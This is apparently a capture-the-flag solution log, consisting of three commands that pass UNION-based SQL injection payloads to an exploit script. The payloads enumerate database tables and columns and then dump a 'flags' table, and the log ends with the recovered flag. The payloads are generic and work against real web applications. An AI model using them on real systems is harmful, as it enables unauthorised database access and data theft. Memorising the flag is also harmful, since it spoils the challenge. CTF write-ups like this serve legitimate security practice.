./exploit.py "admin' UNION ALL SELECT table_name,2,3,4 FROM information_schema.tables WHERE table_schema=database()#"
./exploit.py "admin' UNION ALL SELECT 1,column_name,3,4 FROM information_schema.columns WHERE table_name='flags'#"
./exploit.py "admin' UNION ALL SELECT id,flag,0,0 from flags#"
FLAG : dctf{Pump_7h3_s7r3am_h4s5_up!_353aa965}